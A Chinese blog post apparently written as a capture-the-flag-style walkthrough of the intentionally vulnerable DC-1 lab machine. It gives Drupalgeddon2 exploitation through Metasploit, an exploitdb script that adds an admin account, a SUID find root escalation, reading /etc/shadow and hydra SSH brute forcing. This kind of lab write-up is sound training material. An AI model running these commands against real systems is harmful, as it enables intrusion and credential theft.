渗透DC-1

已于 2022-04-17 21:34:18 修改
阅读量2.7k 收藏 1
点赞数 1
分类专栏: 网络安全 文章标签: 学习
于 2022-04-17 21:12:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/baidu_41553551/article/details/124228819
版权

参考 渗透测试靶机:DC-1_prettyX的博客-CSDN博客_dc-1靶机渗透 

1、扫描主机

arp-scan -l

 2、使用nmap扫描mac地址(在vbox上有设置的这个)对应的ip 180

nmap -sV -A ip

-sV:探测端口服务版本;

-A:全面系统检测。

 3、打开运行的网址

4、安装插件Wappalyzer

可以获取到Drupal的版本

利用漏洞

1、进入msf

msfconsole

2、查找模块可利用漏洞

search drupal

可以看到很多漏洞,这里使用2018年的,使用的时候仅需要在前面加上use,如下图

use exploit/unix/webapp/drupal_drupalgeddon2

 

set RHOSTS 192.168.110.180
run

 

 获得了shell

3、根据Flag1的提示,我们查找、查看CMS配置文件: 

发现第2个flag文件和数据库用户名和密码

虚拟终端pty,python下可以调用pty这个库获得交互式shell

在shell下输入

python -c "import pty;pty.spawn('/bin/sh')"

下面调用以后会出现$ 

mysql -udbuser -pR0ck3t
show databases;
use drupaldb;
show tables;


 select * from users;

 

在exploitdb中有一个针对Drupal 7版本的攻击脚本,可以增加一个admin权限的用户账号,使用此方法简便了破解admin的密码,更直接。

searchsploit drupal


python /usr/share/exploitdb/exploits/php/webapps/34992.py -t http://192.168.110.180 -u admin2 -p admin2

 运行出错

 因为2.x python打印是print"内容"  3.x python打印是print("内容")

那么改成

python2 /usr/share/exploitdb/exploits/php/webapps/34992.py -t http://192.168.110.180 -u admin2 -p admin2

或者对python加入版本控制

对python版本设置版本控制_贪睡的蜗牛的博客-CSDN博客

 

 

 去数据库查看是否加入成功

使用admin2登录,会发现登录成功 

 

 

/etc/shadow文件存放着linux系统用户的密码信息,称为影子文件,该文件允许所有用户读取,因此linux系统将用户的密码从文件分离出来,并单独放到/etc/passwd,此文件只有root用户拥有读权限

应该要查看shadow文件,并使用find命令提权

使用find命令查找有特殊权限suid的命令

find / -perm -4000

 使用find命令提权,root

find ./ aaa -exec '/bin/sh' \;

 获得权限并查看文件

whoami
cat /etc/shadow

 

使用hydra+John密码包对flag4的密码进行爆破

新建一个john 

mkdir john
cd /john

下载john 

wget http://www.openwall.com/john/j/john-1.8.0.tar.gz

解压john 

tar -xvf john-1.8.0.tar.gz

 

进入src文件夹里面

cd /john/john-1.8.0/src

 编译john 

make

对john的解释

语法: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [service://server[:PORT][/OPT]]

参数

含义

-R

接着上一次的破解进度继续破解

-L

指定一个用户名字典

-l

指定一个用户名

-P

指定一个密码字典

-p

指定一个密码

-e nsr

n 代表空密码
s 代表密码与用户名相同
r 用户名反向(root:toor)

-o

将爆破结果保存到文件中

-t

指定爆破的线程

-vV

显示详细的爆破细节

-f

当遇到正确的用户名和密码的时,就立即停止爆破

-M

指定爆破目标文件

hydra ssh://192.168.40.140 -L /usr/share/wordlists/user_1.txt -P /usr/share/wordlists/pass_1.txt -t 16 -f -vV

-L指定一个用户名字典,-P指定一个密码字典,-t指定爆破的线程,-f爆破成功时候,停止爆破,-vV显示爆破进程

我们使用下面这个

hydra -l flag4 -P /john/john-1.8.0/run/password.lst ssh://192.168.110.180 -f -vV -o hydraflag4.ssh

 

flag4用户使用ssh登录

ssh flag4@192.168.110.180

 在家目录里面发现

 但是发现没有权限访问

 进行提权

 

然后在root家里发现最后一个flag文件 

贪睡的蜗牛
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
DC-1靶机教程
qq_42553928的博客
04-07 5231
1.明确目标 DC:1 下载地址 https ://download.vulnhub.com/dc/DC-1.zip 2.信息收集 2.1被动信息收集 2.1.1DC:1网页信息收集 https://www.vulnhub.com/entry/dc-1,292/ Description Back to the Top DESCRIPTION DC-1 is a purposely built vulnerable lab for the purpose of gaining experience in
DC-1靶机的渗透学习
里丘~班诺的小屋
08-31 2171
一、靶机的环境搭配 攻击机(KALI):192.168.226.129 靶机(DC-1): 192.168.226.131(未知) 靶机地址:https://www.vulnhub.com/entry/dc-1,292/ 二、战前准备 要求:攻击机和靶机在同一网段下,使用NAT模式 1、找到kali的IP地址,用nmap扫描同一网段找到靶机的IP 一般扫描出来的在中间而129是kali的,所以可以确定的是靶机的地址是192.168...
DC-1靶机渗透
m0_62008601的博客
04-28 3599
攻击机:kali IP:192.168.56.102 靶机:DC-1 IP:192.168.56.101 我的DC-1是在virtualbox打开的,导入VMware的话,扫描ip的时候扫不出来(不一定每个人都是这样)网络设置的是仅主机网络 kali是在VMware里的,网络设置为桥接模式,这样也能确保在同一c段,就能扫得出结果。 在ka...
DC靶场系列--DC1
BGiscool的博客
06-28 4855
DC靶场,主要是通过web渗透技术,拿到web服务器的权限,会有flag做为标记,以拿到最终的flag为目标。DC1是vulnhub平台下的DC系列的第一个靶场,接下来我将会出DC系列的教程,有做的不对或者不完善之处,还请各位小伙伴们不吝指导。 ...
Vulnhub靶机渗透测试实战(一):DC-1(入门)
热门推荐
weixin_41038469的博客
03-11 2万+
关于Vulnhub Vulnhub是一个特别好的渗透测试实战网站,提供了许多带有漏洞的渗透测试虚拟机下载。 新手入门DC-1: 下载地址: https://www.vulnhub.com/entry/dc-1-1,292/ 主机渗透系统: macOS10.13 安装好虚拟机后挂载Virtualbox运行 第一次进行渗透实战演练,打开虚拟机后发现需要登录密码,一脸懵逼。翻查网页上的介绍才知道,就是不...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
DC-4-Web渗透测试靶机
最新发布
01-19
DC-4-Web渗透测试靶机】是一个专门为网络安全专业人士设计的模拟环境,主要用于学习和实践Web渗透测试技术。在Web渗透测试中,目标是识别并利用网站应用程序的安全漏洞,以便于预防或修复这些漏洞,保护真实的网络...
[渗透测试][Kali]对DC-1靶机进行渗透测试
多皮哦的博客
07-15 3654
1.搭建渗透平台 2.准备工作 3.扫描端口 4.使用msfconsole扫描网站目录 5.在msfconsole中查询并尝试针对Drupal的工具 6.数据库操作 7.从网页登陆admin账户 8. 得到flag3之后的操作 9. 使用find命令提升权限
渗透测试靶场练习(三)之DC-1
习惯积淀的博客
04-10 3162
DC-1 环境搭建就不细述了,直接下载VM文件打开即可,注意设置好网络 下载链接下载 主机发现 使用arp-scan -l在局域网中查找存活主机 可以知道IP为192.168.24.133的主机为靶机 端口扫描 扫描结果显示打开了四个端口,首先看看80端口 是一个网站的登录界面,查看源码没有发现有用的信息 尝试目录扫描,扫描了很久也没什么收获,使用wappalyzer插件识别出这是dr...
渗透项目】靶机DC-1渗透过程
命运的旋律的博客
03-18 381
文章目录信息收集主机发现端口扫描网站指纹扫描目录扫描浏览网站漏洞利用提权操作后记 本文是对靶机DC-1渗透的关键点进行简单记录 信息收集 主机发现 端口扫描 先利用masscan快速确认开放端口,再用nmap确认端口服务 网站指纹扫描 目录扫描 浏览网站 访问目标网站查找有用信息 登陆网站就看到大大登陆界面,因此肯定先从这个登陆界面下手 在尝试进行sql万能密码登陆以及确认已注册用户并...
我爱做靶机之DC-1
shy的博客
05-25 339
下载地址:https://www.vulnhub.com/entry/dc-1-1,292/ 主机发现 端口扫描 发现开启了22 80 443端口,访问80端口,发现是Drupal cms 访问nmap中扫描出来的robots.txt文件 在UPGRADE.txt发现drupal版本为7.x 使用kali中的searchsploit搜索关于drupal 7的漏洞 使用/usr/share/exploitdb/exploits/php/webapps/34992...
kali对DC-1的渗透
这是笔者初学时所做的笔记,有错误的地方太多了,有些结论也只是笔者的一家之言。请自行判断
02-21 945
受疫情影响,我敲代码的地方从学校换到了家里,在家里无聊的实在学不下新东西,所以把前段时间对DC-1靶机渗透的一些截图稍微整理了一下(可能有些内容在大佬面前是废话,小儿科的东西也截了出来,而一些重点没有截到, 不过这就是一个初入kali的新手写的东西) 首先,使用arp-scan 扫描整个网段,发现目标地址 然后用 nmap 进行端口和服务扫描 根据扫描结果,访问 80 端口的 http,寻找可利...
Vulnhub靶机:DC-1渗透详细过程
IerkeU的博客
01-27 2738
这次练习的是vulnhub平台下的DC系列靶机第一台,下载地址为https://www.vulnhub.com/entry/dc-1,292。该靶机的难度系数为简单,其中有五个flag,我们在练习的过程中可以直接跳过其中以部分flag中的提示直接拿到root权限。
Linux中find命令的使用及参数
qq_47656380的博客
08-16 1125
find / -name 文件名:表示按名称在/下搜索文件 find / -user 用户名 :表示按用户名在/下搜索文件 find /root -not -user 用户名:表示在/root查找不是这个用户名的文件 find / -group 组名:表示按用户组在/下搜索文件 find /root -type 文件类型:表示在/root按文件类型查找文件 find /root -perm 权限 :表示在/root下按权限查找文件 find / -perm 111:表示在/下查找权限是111的文件
渗透测试靶机练习-DC-1 实战
飞鱼的企鹅的博客
06-15 4208
第一次深入的了解靶机,下面把我做题的整个流程写在下面,仅供参考 靶机介绍 我所用的靶机是在vulnhub上下载的,网址如下 https://www.vulnhub.com/?page=1 里面有许多靶机可以供我们练习,我之后也将会花很多时间去练习,来提高自己的技术。对DC-1的介绍如下 大概意思啊是这个靶机需要你获得root权限,并找到所有的5个flag 入侵靶机 DC-1下载好之后,可以在VM...
渗透DC-1靶机设计思路
05-24
设计思路: 1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如Nessus、OpenVAS等扫描DC-1,寻找漏洞。 4. 渗透攻击:根据扫描结果,利用漏洞进行攻击。可以使用一些常见的攻击手段,如SQL注入、XSS、文件包含、远程代码执行等。 5. 提升权限:在攻击成功后,需要提升自己的权限,获取更高的权限。可以使用一些提权工具,如Metasploit。 6. 横向移动:在获得了足够的权限后,可以尝试横向移动,进一步渗透网络。 7. 维持访问:在渗透成功后,需要维持访问,以便长期监控目标。 8. 清理痕迹:在攻击结束后,需要清理自己留下的痕迹,以免被发现。 以上是一个基本的渗透DC-1靶机的设计思路,但是具体实施过程中需要根据实际情况进行调整和优化。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

贪睡的蜗牛

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值